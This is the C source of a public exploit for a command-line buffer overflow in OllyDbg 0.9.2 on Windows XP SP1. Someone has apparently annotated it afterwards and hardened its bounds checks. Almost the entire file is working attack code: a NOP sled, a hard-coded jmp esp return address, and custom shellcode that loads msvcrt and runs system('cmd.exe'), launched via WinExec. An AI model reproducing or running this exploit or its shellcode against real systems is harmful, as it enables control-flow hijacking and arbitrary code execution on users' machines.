
/* Ollydbg 0.9.2 exploit. This can be grabbed from http://sh0dan.org/files/ollyexploit.c
   Very lame, just getting the hang of this win32 stuff.
   Ollydbg is vulnerable to a buffer overflow when a valid program is passed
   with a large argv[]; this made debugging other local overflows, well, troublesome,
   so I thought I'd write a little exploit for it. This is what happens when you have
   too much free time... Shellcode is my own, not optimized: I need to figure out
   how to push the full msvcrt and cmd.exe strings to the stack (I created this shellcode using
   Visual C++ __asm, so eh, yeh). This exploit will only work on WinXP SP1 due to hardcoding the
   jmp esp in kernel32.dll; the shellcode addresses are hardcoded for XP SP1 as well.
   Take a peek at http://sh0dan.org/files/llacmd.txt for win2ksp3 shellcode.
   Ollydbg can be downloaded from: http://home.t-online.de/home/Ollydbg/ if you're curious.
   -wire
   shouts to my kittens.
   */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Stage-2 payload executed once the hijacked return lands on the NOP sled.
 *
 * What it does, as written: set up a small stack frame, spell "msvcrt" onto
 * the stack and call LoadLibraryA() on it, then spell "cmd.exe" into the same
 * slot and call msvcrt!system() on it.  Both API addresses are absolute and,
 * per the header comment, valid only on Windows XP SP1 (no API resolution).
 *
 * The array holds 105 bytes of code plus the implicit string NUL; main() copies
 * exactly 105 bytes.  The code contains no 0x00 byte, which matters because the
 * whole payload is handed to WinExec() as a C string.
 *
 * Both strings are built at [ebp-8]: two pushes of a zeroed register reserve
 * 8 zero bytes, single-byte stores fill in the characters, and the untouched
 * zero byte(s) serve as the NUL terminator.
 */
char shellcizode[] = 
                     "\x55"                    // push ebp                    ; prologue: save ebx/esi/edi ...
                     "\x8b\xec"                // mov ebp, esp
                     "\x53"                    // push ebx
                     "\x56"                    // push esi
                     "\x57"                    // push edi
                     "\x8b\xe5"                // mov esp, ebp                ; ... then open a fresh frame
                     "\x55"                    // push ebp
                     "\x8b\xec"                // mov ebp, esp
                     "\x33\xff"                // xor edi,edi
                     "\x57"                    // push edi                    ; [ebp-4] = 0
                     "\x57"                    // push edi                    ; [ebp-8] = 0 -> 8 zeroed bytes for the string
                     "\xc6\x45\xf8\x6d"            // mov byte ptr ss:[ebp-8],6d  'm'
                     "\xc6\x45\xf9\x73"            // mov byte ptr ss:[ebp-7],73  's'
                     "\xc6\x45\xfa\x76"            // mov byte ptr ss:[ebp-6],76  'v'
                     "\xc6\x45\xfb\x63"            // mov byte ptr ss:[ebp-5],63  'c'
                     "\xc6\x45\xfc\x72"            // mov byte ptr ss:[ebp-4],72  'r'
                     "\xc6\x45\xfd\x74"            // mov byte ptr ss:[ebp-3],74  't'  -> "msvcrt\0\0"
                     "\xb8\x61\xd9\xe7\x77"         // mov eax, 77e7d961          ; kernel32!LoadLibraryA on XP SP1 (immediate is little-endian)
                     "\x50"                    // push eax                    ; [ebp-0c] = &LoadLibraryA
                     "\x8d\x45\xf8"                // lea eax, dword ptr ss:[ebp-8]
                     "\x50"                    // push eax                    ; arg: "msvcrt"
                     "\xff\x55\xf4"                // call dword ptr ss:[ebp-c]   ; LoadLibraryA("msvcrt"); stdcall, callee pops the arg
                     "\x58"                    // pop eax                     ; discard the saved LoadLibraryA address
                     "\x58"                    // pop eax                     ; discard the two dwords holding "msvcrt" ...
                     "\x58"                    // pop eax                     ; ... esp is back at ebp
                     "\x33\xc0"                // xor eax,eax
                     "\x50"                    // push eax                    ; [ebp-4] = 0
                     "\x50"                    // push eax                    ; [ebp-8] = 0
                     "\xc6\x45\xf8\x63"            // mov byte ptr ss:[ebp-8],63  'c'
                     "\xc6\x45\xf9\x6d"            // mov byte ptr ss:[ebp-7],6d  'm'
                     "\xc6\x45\xfa\x64"            // mov byte ptr ss:[ebp-6],64  'd'
                     "\xc6\x45\xfb\x2e"            // mov byte ptr ss:[ebp-5],2e  '.'
                     "\xc6\x45\xfc\x65"            // mov byte ptr ss:[ebp-4],65  'e'
                     "\xc6\x45\xfd\x78"            // mov byte ptr ss:[ebp-3],78  'x'
                     "\xc6\x45\xfe\x65"            // mov byte ptr ss:[ebp-2],65  'e'  -> "cmd.exe\0"
                     "\xb8\x44\x80\xc2\x77"            // mov eax, 77c28044          ; msvcrt!system on XP SP1
                     "\x50"                    // push eax                    ; [ebp-0c] = &system
                     "\x8d\x45\xf8"                // lea eax, dword ptr ss:[ebp-8]
                     "\x50"                    // push eax                    ; arg: "cmd.exe"
                     "\xff\x55\xf4"                // call dword ptr ss:[ebp-c]   ; system("cmd.exe"); cdecl, blocks until the shell exits
                     "\x83\xc4\x04"                // add esp, 04h                ; drop the "cmd.exe" pointer argument
                     "\x5c"                    // pop esp                     ; NOTE(review): this appears to load esp from the saved system() address ...
                     "\xc3";                // ret                         ; ... so this is not a clean return; the debugger is presumably left to crash once cmd.exe exits

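/*
 * Entry point: build the overlong OllyDbg command line and launch it.
 *
 * argv[1] is the path to ollydbg.exe.  The launched command line is
 *   "<olly> <olly> <NOP sled><jmp esp addr><3 NOPs><shellcode><NOP padding>"
 * i.e. OllyDbg is started with a copy of itself as the debuggee and an
 * argument string long enough to overrun the vulnerable buffer.
 *
 * Returns 0 after a successful WinExec(); exits/returns 1 on bad usage, an
 * over-long path, or a failed WinExec().
 *
 * Offsets: the return address is written at 511 + 2*strlen(path) and the
 * shellcode 7 bytes later.  The author's stated reason is that the path
 * appears twice on the command line, so every extra path character moves the
 * saved return address by two.  These offsets and the jmp esp address are
 * specific to OllyDbg 0.9.2 on Windows XP SP1 and are kept exactly as found.
 */
int main(int argc, char **argv) {
    enum {
        EXP_SIZE       = 1024,                   /* payload buffer */
        OLLY_PATH_SIZE = 100,                    /* longest accepted path, incl. NUL */
        CMD_SIZE       = 2 * OLLY_PATH_SIZE + 2, /* "<path> <path> " + NUL */
        RET_OFFSET     = 511,                    /* saved return address, for an empty path */
        SC_OFFSET      = 518,                    /* shellcode start, for an empty path */
        MIN_PAYLOAD    = 700                     /* the original always terminated here */
    };
    char exp_buff[EXP_SIZE];
    char ollyfile[OLLY_PATH_SIZE];
    char hehbuf[CMD_SIZE];
    size_t x, sc_len, end;
    int n;
    DWORD jmpesp = 0x77E9AE59; /* jmp esp inside kernel32.dll, Windows XP SP1 only */

    if (argc != 2) {
        fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
        exit(1);
    }

    /* snprintf() always NUL-terminates and reports truncation.  The original
     * strncpy() followed by ollyfile[100] = 0 wrote one byte past the end of
     * the array and silently truncated long paths. */
    n = snprintf(ollyfile, sizeof ollyfile, "%s", argv[1]);
    if (n < 0 || (size_t)n >= sizeof ollyfile) {
        fprintf(stderr, "heh: path too long (max %d chars)\n", OLLY_PATH_SIZE - 1);
        exit(1);
    }

    /* Each path character shifts the return address by two, because the path
     * is on the command line twice (see the header comment on offsets). */
    x = strlen(ollyfile) * 2;

    memset(exp_buff, 0x90, sizeof exp_buff); /* NOP sled everywhere we do not overwrite */

    /* "C:\olly\ollydbg.exe C:\olly\ollydbg.exe " -- hehbuf is sized so that
     * two maximal paths plus separators always fit (the original 200-byte
     * buffer was one byte short for a 99-character path). */
    n = snprintf(hehbuf, sizeof hehbuf, "%s %s ", ollyfile, ollyfile);
    if (n < 0 || (size_t)n >= sizeof hehbuf) {
        fprintf(stderr, "heh: command line too long\n");
        exit(1);
    }
    memcpy(exp_buff, hehbuf, (size_t)n);

    /* Overwrite the saved return address with the jmp esp gadget. */
    memcpy(exp_buff + RET_OFFSET + x, &jmpesp, sizeof jmpesp);

    /* Shellcode follows the gadget after 3 NOPs; sizeof drops the string NUL
     * instead of hard-coding the 105-byte length. */
    sc_len = sizeof shellcizode - 1;
    memcpy(exp_buff + SC_OFFSET + x, shellcizode, sc_len);

    /* Terminate so WinExec() sees a valid C string.  The original always wrote
     * the NUL at offset 700, which cut into the shellcode for any path longer
     * than 38 characters; place it after the shellcode, but never earlier than
     * before.  Worst case: 518 + 198 + 105 = 821 < 1024. */
    end = SC_OFFSET + x + sc_len;
    if (end < MIN_PAYLOAD)
        end = MIN_PAYLOAD;
    exp_buff[end] = '\0';

    /* WinExec() returns a value greater than 31 on success. */
    if (WinExec(exp_buff, SW_SHOW) <= 31) {
        fprintf(stderr, "heh: WinExec failed\n");
        return 1;
    }
    return 0;
}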